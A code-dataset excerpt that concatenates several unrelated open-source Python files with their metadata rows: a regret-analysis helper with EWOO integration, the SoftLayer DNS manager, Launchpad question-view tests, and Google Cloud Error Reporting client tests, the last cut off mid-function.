try: self.etas, self.regs_etas = kwargs['etas'], kwargs['regs_etas']
except KeyError: pass
try: self.alphas, self.thetas, self.regs_alphas = kwargs['alphas'], kwargs['thetas'], kwargs['regs_alphas']
except KeyError: pass
else:
self.regs_norate = kwargs['regs_{}'.format(self.algo)]
Nslopes = np.minimum(1000, np.floor(self.problem.T/3))
self.slopes, self.slopes_bnd = self.estimate_loglog_slopes(Nslopes)
def estimate_loglog_slopes(self, N=500):
""" Estimates slopes of the asymptotic log-log plot
        for each element of tsavg_regret, using the N last data points """
slopes, slopes_bnd = {}, {}
try:
slopes['etaopts'] = self.loglog_slopes(self.regs_etaopts['tsavg'], N)
slopes_bnd['etaopts'] = self.loglog_slopes(self.regs_etaopts['tsavgbnd'], N)
except AttributeError: pass
try:
slopes['etas'] = self.loglog_slopes(self.regs_etas['tsavg'], N)
slopes_bnd['etas'] = self.loglog_slopes(self.regs_etas['tsavgbnd'], N)
except AttributeError: pass
try:
slopes['alphas'] = self.loglog_slopes(self.regs_alphas['tsavg'], N)
slopes_bnd['alphas'] = self.loglog_slopes(self.regs_alphas['tsavgbnd'], N)
except AttributeError: pass
try:
slopes['{}'.format(self.algo)] = self.loglog_slopes(self.regs_norate['tsavg'], N)
slopes_bnd['{}'.format(self.algo)] = self.loglog_slopes(self.regs_norate['tsavgbnd'], N)
except AttributeError: pass
return slopes, slopes_bnd
def loglog_slopes(self, regrets, N):
slopes = []
for regret in regrets:
T = np.arange(len(regret)-N, len(regret))
Y = regret[len(regret)-N:]
slope = linregress(np.log(T), np.log(Y))[0]
slopes.append(slope)
return slopes
def action_EWOO(cumLossFunc, alpha, ranges, tmpfolder='libs/'):
""" Function for computing the (single) action of the EWOO algorithm """
header = ['#include <math.h>\n\n',
'double alpha = {};\n'.format(alpha)]
func = cumLossFunc.gen_ccode()
ccode = header + func + [' return exp(-alpha*loss);\n',
' }']
integr = ctypes_integrate(ccode, ranges, tmpfolder)
actions = []
for i in range(cumLossFunc.domain.n):
footer = [' return args[{}]*exp(-alpha*loss);\n'.format(i),
' }']
ccode = header + func + footer
actions.append(ctypes_integrate(ccode, ranges, tmpfolder)/integr)
return np.array(actions)
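# Note (added sketch, not part of the original file): the integrals above implement the
# EWOO action, i.e. coordinate-wise
#   x_i = Int_S s_i * exp(-alpha*L(s)) ds / Int_S exp(-alpha*L(s)) ds,
# where L is the cumulative loss cumLossFunc. A rough Monte-Carlo check of the same
# quantity (using only methods already used in this module) could look like:
#   samples = cumLossFunc.domain.sample_uniform(100000)
#   weights = np.exp(-alpha*cumLossFunc.val(samples)).ravel()
#   action_mc = np.average(samples, axis=0, weights=weights)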
| mit | -6,658,337,883,254,105,000 | 55.056075 | 152 | 0.520007 | false |
kyubifire/softlayer-python | SoftLayer/managers/dns.py | 1 | 8207 | """
SoftLayer.dns
~~~~~~~~~~~~~
DNS Manager/helpers
:license: MIT, see LICENSE for more details.
"""
import time
from SoftLayer import utils
class DNSManager(utils.IdentifierMixin, object):
"""Manage SoftLayer DNS.
See product information here: http://www.softlayer.com/DOMAIN-SERVICES
:param SoftLayer.API.BaseClient client: the client instance
"""
def __init__(self, client):
self.client = client
self.service = self.client['Dns_Domain']
self.record = self.client['Dns_Domain_ResourceRecord']
self.resolvers = [self._get_zone_id_from_name]
def _get_zone_id_from_name(self, name):
"""Return zone ID based on a zone."""
results = self.client['Account'].getDomains(
filter={"domains": {"name": utils.query_filter(name)}})
return [x['id'] for x in results]
def list_zones(self, **kwargs):
"""Retrieve a list of all DNS zones.
:param dict \\*\\*kwargs: response-level options (mask, limit, etc.)
:returns: A list of dictionaries representing the matching zones.
"""
return self.client['Account'].getDomains(**kwargs)
def get_zone(self, zone_id, records=True):
"""Get a zone and its records.
        :param zone_id: the zone's ID
:returns: A dictionary containing a large amount of information about
the specified zone.
"""
mask = None
if records:
mask = 'resourceRecords'
return self.service.getObject(id=zone_id, mask=mask)
def create_zone(self, zone, serial=None):
"""Create a zone for the specified zone.
:param zone: the zone name to create
:param serial: serial value on the zone (default: strftime(%Y%m%d01))
"""
return self.service.createObject({
'name': zone,
'serial': serial or time.strftime('%Y%m%d01'),
"resourceRecords": {}})
def delete_zone(self, zone_id):
"""Delete a zone by its ID.
:param integer zone_id: the zone ID to delete
"""
return self.service.deleteObject(id=zone_id)
def edit_zone(self, zone):
"""Update an existing zone with the options provided.
The provided dict must include an 'id' key and value corresponding
to the zone that should be updated.
:param dict zone: the zone to update
"""
self.service.editObject(zone)
def create_record(self, zone_id, record, record_type, data, ttl=60):
"""Create a resource record on a domain.
:param integer id: the zone's ID
:param record: the name of the record to add
:param record_type: the type of record (A, AAAA, CNAME, TXT, etc.)
:param data: the record's value
:param integer ttl: the TTL or time-to-live value (default: 60)
"""
resource_record = self._generate_create_dict(record, record_type, data,
ttl, domainId=zone_id)
return self.record.createObject(resource_record)
def create_record_mx(self, zone_id, record, data, ttl=60, priority=10):
"""Create a mx resource record on a domain.
:param integer id: the zone's ID
:param record: the name of the record to add
:param data: the record's value
:param integer ttl: the TTL or time-to-live value (default: 60)
:param integer priority: the priority of the target host
"""
resource_record = self._generate_create_dict(record, 'MX', data, ttl,
domainId=zone_id, mxPriority=priority)
return self.record.createObject(resource_record)
def create_record_srv(self, zone_id, record, data, protocol, port, service,
ttl=60, priority=20, weight=10):
"""Create a resource record on a domain.
:param integer id: the zone's ID
:param record: the name of the record to add
:param data: the record's value
:param string protocol: the protocol of the service, usually either TCP or UDP.
:param integer port: the TCP or UDP port on which the service is to be found.
:param string service: the symbolic name of the desired service.
:param integer ttl: the TTL or time-to-live value (default: 60)
:param integer priority: the priority of the target host (default: 20)
:param integer weight: relative weight for records with same priority (default: 10)
"""
resource_record = self._generate_create_dict(record, 'SRV', data, ttl, domainId=zone_id,
priority=priority, protocol=protocol, port=port,
service=service, weight=weight)
# The createObject won't creates SRV records unless we send the following complexType.
resource_record['complexType'] = 'SoftLayer_Dns_Domain_ResourceRecord_SrvType'
return self.record.createObject(resource_record)
def create_record_ptr(self, record, data, ttl=60):
"""Create a reverse record.
        :param record: the public IP address of the device for which you would like to manage reverse DNS.
:param data: the record's value
:param integer ttl: the TTL or time-to-live value (default: 60)
"""
resource_record = self._generate_create_dict(record, 'PTR', data, ttl)
return self.record.createObject(resource_record)
@staticmethod
def _generate_create_dict(record, record_type, data, ttl, **kwargs):
"""Returns a dict appropriate to pass into Dns_Domain_ResourceRecord::createObject"""
# Basic dns record structure
resource_record = {
'host': record,
'data': data,
'ttl': ttl,
'type': record_type
}
for (key, value) in kwargs.items():
resource_record.setdefault(key, value)
return resource_record
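    # Illustrative example (added; the values are made up): for an A record,
    #   DNSManager._generate_create_dict('www', 'a', '10.0.0.1', 60, domainId=12345)
    # returns
    #   {'host': 'www', 'data': '10.0.0.1', 'ttl': 60, 'type': 'a', 'domainId': 12345}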
def delete_record(self, record_id):
"""Delete a resource record by its ID.
:param integer id: the record's ID
"""
self.record.deleteObject(id=record_id)
def get_record(self, record_id):
"""Get a DNS record.
:param integer id: the record's ID
"""
return self.record.getObject(id=record_id)
def get_records(self, zone_id, ttl=None, data=None, host=None,
record_type=None):
"""List, and optionally filter, records within a zone.
        :param zone_id: the ID of the zone in which to search.
:param int ttl: time in seconds
:param str data: the records data
:param str host: record's host
:param str record_type: the type of record
:returns: A list of dictionaries representing the matching records
within the specified zone.
"""
_filter = utils.NestedDict()
if ttl:
_filter['resourceRecords']['ttl'] = utils.query_filter(ttl)
if host:
_filter['resourceRecords']['host'] = utils.query_filter(host)
if data:
_filter['resourceRecords']['data'] = utils.query_filter(data)
if record_type:
_filter['resourceRecords']['type'] = utils.query_filter(
record_type.lower())
results = self.service.getResourceRecords(
id=zone_id,
mask='id,expire,domainId,host,minimum,refresh,retry,'
'mxPriority,ttl,type,data,responsiblePerson',
filter=_filter.to_dict(),
)
return results
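    # Example sketch (added; the zone ID 123456 is a placeholder):
    #   mgr = DNSManager(client)
    #   www_records = mgr.get_records(123456, host='www', record_type='a')
    # would return only the records in that zone whose host is 'www' and type is 'a'.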
def edit_record(self, record):
"""Update an existing record with the options provided.
The provided dict must include an 'id' key and value corresponding to
the record that should be updated.
:param dict record: the record to update
"""
self.record.editObject(record, id=record['id'])
def dump_zone(self, zone_id):
"""Retrieve a zone dump in BIND format.
:param integer id: The zone ID to dump
"""
return self.service.getZoneFileContents(id=zone_id)
| mit | 1,036,015,339,823,414,800 | 33.628692 | 102 | 0.60156 | false |
abramhindle/UnnaturalCodeFork | python/testdata/launchpad/lib/lp/answers/browser/tests/test_question.py | 1 | 6315 | # Copyright 2010 Canonical Ltd. This software is licensed under the
# GNU Affero General Public License version 3 (see the file LICENSE).
"""Tests for the question module."""
__metaclass__ = type
__all__ = []
from zope.security.proxy import removeSecurityProxy
from lp.answers.browser.question import QuestionTargetWidget
from lp.answers.interfaces.question import IQuestion
from lp.answers.publisher import AnswersLayer
from lp.app.enums import ServiceUsage
from lp.services.webapp.servers import LaunchpadTestRequest
from lp.testing import (
login_person,
logout,
person_logged_in,
TestCaseWithFactory,
)
from lp.testing.layers import DatabaseFunctionalLayer
from lp.testing.views import create_initialized_view
class TestQuestionAddView(TestCaseWithFactory):
"""Verify the behavior of the QuestionAddView."""
layer = DatabaseFunctionalLayer
def setUp(self):
super(TestQuestionAddView, self).setUp()
self.question_target = self.factory.makeProduct()
self.user = self.factory.makePerson()
login_person(self.user)
def getSearchForm(self, title, language='en'):
return {
'field.title': title,
'field.language': language,
'field.actions.continue': 'Continue',
}
def test_question_title_within_max_display_width(self):
# Titles (summary in the view) less than 250 characters are accepted.
form = self.getSearchForm('123456789 ' * 10)
view = create_initialized_view(
self.question_target, name='+addquestion', layer=AnswersLayer,
form=form, principal=self.user)
self.assertEqual([], view.errors)
def test_question_title_exceeds_max_display_width(self):
# Titles (summary in the view) cannot exceed 250 characters.
form = self.getSearchForm('123456789 ' * 26)
view = create_initialized_view(
self.question_target, name='+addquestion', layer=AnswersLayer,
form=form, principal=self.user)
self.assertEqual(1, len(view.errors))
self.assertEqual(
'The summary cannot exceed 250 characters.', view.errors[0])
def test_context_uses_answers(self):
# If a target doesn't use answers, it doesn't provide the form.
#logout()
owner = removeSecurityProxy(self.question_target).owner
with person_logged_in(owner):
self.question_target.answers_usage = ServiceUsage.NOT_APPLICABLE
login_person(self.user)
view = create_initialized_view(
self.question_target, name='+addquestion', layer=AnswersLayer,
principal=self.user)
self.assertFalse(view.context_uses_answers)
contents = view.render()
msg = "<strong>does not use</strong> Launchpad as its answer forum"
self.assertIn(msg, contents)
class QuestionEditViewTestCase(TestCaseWithFactory):
"""Verify the behavior of the QuestionEditView."""
layer = DatabaseFunctionalLayer
def getForm(self, question):
if question.assignee is None:
assignee = ''
else:
assignee = question.assignee.name
return {
'field.title': question.title,
'field.description': question.description,
'field.language': question.language.code,
'field.assignee': assignee,
'field.target': 'product',
'field.target.distribution': '',
'field.target.package': '',
'field.target.product': question.target.name,
'field.whiteboard': question.whiteboard,
'field.actions.change': 'Change',
}
def test_retarget_with_other_changed(self):
# Retargeting must be the last change made to the question
        # to ensure that user permissions do not change while there
# are more changes to make.
target = self.factory.makeProduct()
question = self.factory.makeQuestion(target=target)
other_target = self.factory.makeProduct()
login_person(target.owner)
form = self.getForm(question)
form['field.whiteboard'] = 'comment'
form['field.target.product'] = other_target.name
view = create_initialized_view(
question, name='+edit', layer=AnswersLayer, form=form)
self.assertEqual([], view.errors)
self.assertEqual(other_target, question.target)
self.assertEqual('comment', question.whiteboard)
class QuestionTargetWidgetTestCase(TestCaseWithFactory):
"""Test that QuestionTargetWidgetTestCase behaves as expected."""
layer = DatabaseFunctionalLayer
def getWidget(self, question):
field = IQuestion['target']
bound_field = field.bind(question)
request = LaunchpadTestRequest()
return QuestionTargetWidget(bound_field, request)
def test_getDistributionVocabulary_with_product_question(self):
# The vocabulary does not contain distros that do not use
# launchpad to track answers.
distribution = self.factory.makeDistribution()
product = self.factory.makeProduct()
question = self.factory.makeQuestion(target=product)
target_widget = self.getWidget(question)
vocabulary = target_widget.getDistributionVocabulary()
self.assertEqual(None, vocabulary.distribution)
self.assertFalse(
distribution in vocabulary,
"Vocabulary contains distros that do not use Launchpad Answers.")
def test_getDistributionVocabulary_with_distribution_question(self):
# The vocabulary does not contain distros that do not use
# launchpad to track answers.
distribution = self.factory.makeDistribution()
other_distribution = self.factory.makeDistribution()
question = self.factory.makeQuestion(target=distribution)
target_widget = self.getWidget(question)
vocabulary = target_widget.getDistributionVocabulary()
self.assertEqual(distribution, vocabulary.distribution)
self.assertTrue(
distribution in vocabulary,
"Vocabulary missing context distribution.")
self.assertFalse(
other_distribution in vocabulary,
"Vocabulary contains distros that do not use Launchpad Answers.")
| agpl-3.0 | 8,673,996,265,418,779,000 | 39.480769 | 77 | 0.67015 | false |
googleapis/googleapis-gen | google/devtools/clouderrorreporting/v1beta1/devtools-clouderrorreporting-v1beta1-py/tests/unit/gapic/errorreporting_v1beta1/test_report_errors_service.py | 1 | 48720 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import mock
import packaging.version
import grpc
from grpc.experimental import aio
import math
import pytest
from proto.marshal.rules.dates import DurationRule, TimestampRule
from google.api_core import client_options
from google.api_core import exceptions as core_exceptions
from google.api_core import gapic_v1
from google.api_core import grpc_helpers
from google.api_core import grpc_helpers_async
from google.auth import credentials as ga_credentials
from google.auth.exceptions import MutualTLSChannelError
from google.cloud.errorreporting_v1beta1.services.report_errors_service import ReportErrorsServiceAsyncClient
from google.cloud.errorreporting_v1beta1.services.report_errors_service import ReportErrorsServiceClient
from google.cloud.errorreporting_v1beta1.services.report_errors_service import transports
from google.cloud.errorreporting_v1beta1.services.report_errors_service.transports.base import _GOOGLE_AUTH_VERSION
from google.cloud.errorreporting_v1beta1.types import common
from google.cloud.errorreporting_v1beta1.types import report_errors_service
from google.oauth2 import service_account
from google.protobuf import timestamp_pb2 # type: ignore
import google.auth
# TODO(busunkim): Once google-auth >= 1.25.0 is required transitively
# through google-api-core:
# - Delete the auth "less than" test cases
# - Delete these pytest markers (Make the "greater than or equal to" tests the default).
requires_google_auth_lt_1_25_0 = pytest.mark.skipif(
packaging.version.parse(_GOOGLE_AUTH_VERSION) >= packaging.version.parse("1.25.0"),
reason="This test requires google-auth < 1.25.0",
)
requires_google_auth_gte_1_25_0 = pytest.mark.skipif(
packaging.version.parse(_GOOGLE_AUTH_VERSION) < packaging.version.parse("1.25.0"),
reason="This test requires google-auth >= 1.25.0",
)
def client_cert_source_callback():
return b"cert bytes", b"key bytes"
# If default endpoint is localhost, then default mtls endpoint will be the same.
# This method modifies the default endpoint so the client can produce a different
# mtls endpoint for endpoint testing purposes.
def modify_default_endpoint(client):
return "foo.googleapis.com" if ("localhost" in client.DEFAULT_ENDPOINT) else client.DEFAULT_ENDPOINT
def test__get_default_mtls_endpoint():
api_endpoint = "example.googleapis.com"
api_mtls_endpoint = "example.mtls.googleapis.com"
sandbox_endpoint = "example.sandbox.googleapis.com"
sandbox_mtls_endpoint = "example.mtls.sandbox.googleapis.com"
non_googleapi = "api.example.com"
assert ReportErrorsServiceClient._get_default_mtls_endpoint(None) is None
assert ReportErrorsServiceClient._get_default_mtls_endpoint(api_endpoint) == api_mtls_endpoint
assert ReportErrorsServiceClient._get_default_mtls_endpoint(api_mtls_endpoint) == api_mtls_endpoint
assert ReportErrorsServiceClient._get_default_mtls_endpoint(sandbox_endpoint) == sandbox_mtls_endpoint
assert ReportErrorsServiceClient._get_default_mtls_endpoint(sandbox_mtls_endpoint) == sandbox_mtls_endpoint
assert ReportErrorsServiceClient._get_default_mtls_endpoint(non_googleapi) == non_googleapi
@pytest.mark.parametrize("client_class", [
ReportErrorsServiceClient,
ReportErrorsServiceAsyncClient,
])
def test_report_errors_service_client_from_service_account_info(client_class):
creds = ga_credentials.AnonymousCredentials()
with mock.patch.object(service_account.Credentials, 'from_service_account_info') as factory:
factory.return_value = creds
info = {"valid": True}
client = client_class.from_service_account_info(info)
assert client.transport._credentials == creds
assert isinstance(client, client_class)
assert client.transport._host == 'clouderrorreporting.googleapis.com:443'
@pytest.mark.parametrize("client_class", [
ReportErrorsServiceClient,
ReportErrorsServiceAsyncClient,
])
def test_report_errors_service_client_service_account_always_use_jwt(client_class):
with mock.patch.object(service_account.Credentials, 'with_always_use_jwt_access', create=True) as use_jwt:
creds = service_account.Credentials(None, None, None)
client = client_class(credentials=creds)
use_jwt.assert_not_called()
@pytest.mark.parametrize("transport_class,transport_name", [
(transports.ReportErrorsServiceGrpcTransport, "grpc"),
(transports.ReportErrorsServiceGrpcAsyncIOTransport, "grpc_asyncio"),
])
def test_report_errors_service_client_service_account_always_use_jwt_true(transport_class, transport_name):
with mock.patch.object(service_account.Credentials, 'with_always_use_jwt_access', create=True) as use_jwt:
creds = service_account.Credentials(None, None, None)
transport = transport_class(credentials=creds, always_use_jwt_access=True)
use_jwt.assert_called_once_with(True)
@pytest.mark.parametrize("client_class", [
ReportErrorsServiceClient,
ReportErrorsServiceAsyncClient,
])
def test_report_errors_service_client_from_service_account_file(client_class):
creds = ga_credentials.AnonymousCredentials()
with mock.patch.object(service_account.Credentials, 'from_service_account_file') as factory:
factory.return_value = creds
client = client_class.from_service_account_file("dummy/file/path.json")
assert client.transport._credentials == creds
assert isinstance(client, client_class)
client = client_class.from_service_account_json("dummy/file/path.json")
assert client.transport._credentials == creds
assert isinstance(client, client_class)
assert client.transport._host == 'clouderrorreporting.googleapis.com:443'
def test_report_errors_service_client_get_transport_class():
transport = ReportErrorsServiceClient.get_transport_class()
available_transports = [
transports.ReportErrorsServiceGrpcTransport,
]
assert transport in available_transports
transport = ReportErrorsServiceClient.get_transport_class("grpc")
assert transport == transports.ReportErrorsServiceGrpcTransport
@pytest.mark.parametrize("client_class,transport_class,transport_name", [
(ReportErrorsServiceClient, transports.ReportErrorsServiceGrpcTransport, "grpc"),
(ReportErrorsServiceAsyncClient, transports.ReportErrorsServiceGrpcAsyncIOTransport, "grpc_asyncio"),
])
@mock.patch.object(ReportErrorsServiceClient, "DEFAULT_ENDPOINT", modify_default_endpoint(ReportErrorsServiceClient))
@mock.patch.object(ReportErrorsServiceAsyncClient, "DEFAULT_ENDPOINT", modify_default_endpoint(ReportErrorsServiceAsyncClient))
def test_report_errors_service_client_client_options(client_class, transport_class, transport_name):
# Check that if channel is provided we won't create a new one.
with mock.patch.object(ReportErrorsServiceClient, 'get_transport_class') as gtc:
transport = transport_class(
credentials=ga_credentials.AnonymousCredentials()
)
client = client_class(transport=transport)
gtc.assert_not_called()
# Check that if channel is provided via str we will create a new one.
with mock.patch.object(ReportErrorsServiceClient, 'get_transport_class') as gtc:
client = client_class(transport=transport_name)
gtc.assert_called()
# Check the case api_endpoint is provided.
options = client_options.ClientOptions(api_endpoint="squid.clam.whelk")
with mock.patch.object(transport_class, '__init__') as patched:
patched.return_value = None
client = client_class(client_options=options)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host="squid.clam.whelk",
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT is
# "never".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "never"}):
with mock.patch.object(transport_class, '__init__') as patched:
patched.return_value = None
client = client_class()
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT is
# "always".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "always"}):
with mock.patch.object(transport_class, '__init__') as patched:
patched.return_value = None
client = client_class()
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_MTLS_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT has
# unsupported value.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "Unsupported"}):
with pytest.raises(MutualTLSChannelError):
client = client_class()
# Check the case GOOGLE_API_USE_CLIENT_CERTIFICATE has unsupported value.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "Unsupported"}):
with pytest.raises(ValueError):
client = client_class()
# Check the case quota_project_id is provided
options = client_options.ClientOptions(quota_project_id="octopus")
with mock.patch.object(transport_class, '__init__') as patched:
patched.return_value = None
client = client_class(client_options=options)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id="octopus",
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
@pytest.mark.parametrize("client_class,transport_class,transport_name,use_client_cert_env", [
(ReportErrorsServiceClient, transports.ReportErrorsServiceGrpcTransport, "grpc", "true"),
(ReportErrorsServiceAsyncClient, transports.ReportErrorsServiceGrpcAsyncIOTransport, "grpc_asyncio", "true"),
(ReportErrorsServiceClient, transports.ReportErrorsServiceGrpcTransport, "grpc", "false"),
(ReportErrorsServiceAsyncClient, transports.ReportErrorsServiceGrpcAsyncIOTransport, "grpc_asyncio", "false"),
])
@mock.patch.object(ReportErrorsServiceClient, "DEFAULT_ENDPOINT", modify_default_endpoint(ReportErrorsServiceClient))
@mock.patch.object(ReportErrorsServiceAsyncClient, "DEFAULT_ENDPOINT", modify_default_endpoint(ReportErrorsServiceAsyncClient))
@mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "auto"})
def test_report_errors_service_client_mtls_env_auto(client_class, transport_class, transport_name, use_client_cert_env):
# This tests the endpoint autoswitch behavior. Endpoint is autoswitched to the default
# mtls endpoint, if GOOGLE_API_USE_CLIENT_CERTIFICATE is "true" and client cert exists.
# Check the case client_cert_source is provided. Whether client cert is used depends on
# GOOGLE_API_USE_CLIENT_CERTIFICATE value.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}):
options = client_options.ClientOptions(client_cert_source=client_cert_source_callback)
with mock.patch.object(transport_class, '__init__') as patched:
patched.return_value = None
client = client_class(client_options=options)
if use_client_cert_env == "false":
expected_client_cert_source = None
expected_host = client.DEFAULT_ENDPOINT
else:
expected_client_cert_source = client_cert_source_callback
expected_host = client.DEFAULT_MTLS_ENDPOINT
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=expected_host,
scopes=None,
client_cert_source_for_mtls=expected_client_cert_source,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
# Check the case ADC client cert is provided. Whether client cert is used depends on
# GOOGLE_API_USE_CLIENT_CERTIFICATE value.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}):
with mock.patch.object(transport_class, '__init__') as patched:
with mock.patch('google.auth.transport.mtls.has_default_client_cert_source', return_value=True):
with mock.patch('google.auth.transport.mtls.default_client_cert_source', return_value=client_cert_source_callback):
if use_client_cert_env == "false":
expected_host = client.DEFAULT_ENDPOINT
expected_client_cert_source = None
else:
expected_host = client.DEFAULT_MTLS_ENDPOINT
expected_client_cert_source = client_cert_source_callback
patched.return_value = None
client = client_class()
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=expected_host,
scopes=None,
client_cert_source_for_mtls=expected_client_cert_source,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
# Check the case client_cert_source and ADC client cert are not provided.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}):
with mock.patch.object(transport_class, '__init__') as patched:
with mock.patch("google.auth.transport.mtls.has_default_client_cert_source", return_value=False):
patched.return_value = None
client = client_class()
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
@pytest.mark.parametrize("client_class,transport_class,transport_name", [
(ReportErrorsServiceClient, transports.ReportErrorsServiceGrpcTransport, "grpc"),
(ReportErrorsServiceAsyncClient, transports.ReportErrorsServiceGrpcAsyncIOTransport, "grpc_asyncio"),
])
def test_report_errors_service_client_client_options_scopes(client_class, transport_class, transport_name):
# Check the case scopes are provided.
options = client_options.ClientOptions(
scopes=["1", "2"],
)
with mock.patch.object(transport_class, '__init__') as patched:
patched.return_value = None
client = client_class(client_options=options)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=["1", "2"],
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
@pytest.mark.parametrize("client_class,transport_class,transport_name", [
(ReportErrorsServiceClient, transports.ReportErrorsServiceGrpcTransport, "grpc"),
(ReportErrorsServiceAsyncClient, transports.ReportErrorsServiceGrpcAsyncIOTransport, "grpc_asyncio"),
])
def test_report_errors_service_client_client_options_credentials_file(client_class, transport_class, transport_name):
# Check the case credentials file is provided.
options = client_options.ClientOptions(
credentials_file="credentials.json"
)
with mock.patch.object(transport_class, '__init__') as patched:
patched.return_value = None
client = client_class(client_options=options)
patched.assert_called_once_with(
credentials=None,
credentials_file="credentials.json",
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
def test_report_errors_service_client_client_options_from_dict():
with mock.patch('google.cloud.errorreporting_v1beta1.services.report_errors_service.transports.ReportErrorsServiceGrpcTransport.__init__') as grpc_transport:
grpc_transport.return_value = None
client = ReportErrorsServiceClient(
client_options={'api_endpoint': 'squid.clam.whelk'}
)
grpc_transport.assert_called_once_with(
credentials=None,
credentials_file=None,
host="squid.clam.whelk",
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
def test_report_error_event(transport: str = 'grpc', request_type=report_errors_service.ReportErrorEventRequest):
client = ReportErrorsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.report_error_event),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = report_errors_service.ReportErrorEventResponse(
)
response = client.report_error_event(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == report_errors_service.ReportErrorEventRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, report_errors_service.ReportErrorEventResponse)
def test_report_error_event_from_dict():
test_report_error_event(request_type=dict)
def test_report_error_event_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = ReportErrorsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport='grpc',
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.report_error_event),
'__call__') as call:
client.report_error_event()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == report_errors_service.ReportErrorEventRequest()
@pytest.mark.asyncio
async def test_report_error_event_async(transport: str = 'grpc_asyncio', request_type=report_errors_service.ReportErrorEventRequest):
client = ReportErrorsServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.report_error_event),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value =grpc_helpers_async.FakeUnaryUnaryCall(report_errors_service.ReportErrorEventResponse(
))
response = await client.report_error_event(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == report_errors_service.ReportErrorEventRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, report_errors_service.ReportErrorEventResponse)
@pytest.mark.asyncio
async def test_report_error_event_async_from_dict():
await test_report_error_event_async(request_type=dict)
def test_report_error_event_field_headers():
client = ReportErrorsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = report_errors_service.ReportErrorEventRequest()
request.project_name = 'project_name/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.report_error_event),
'__call__') as call:
call.return_value = report_errors_service.ReportErrorEventResponse()
client.report_error_event(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'project_name=project_name/value',
) in kw['metadata']
@pytest.mark.asyncio
async def test_report_error_event_field_headers_async():
client = ReportErrorsServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
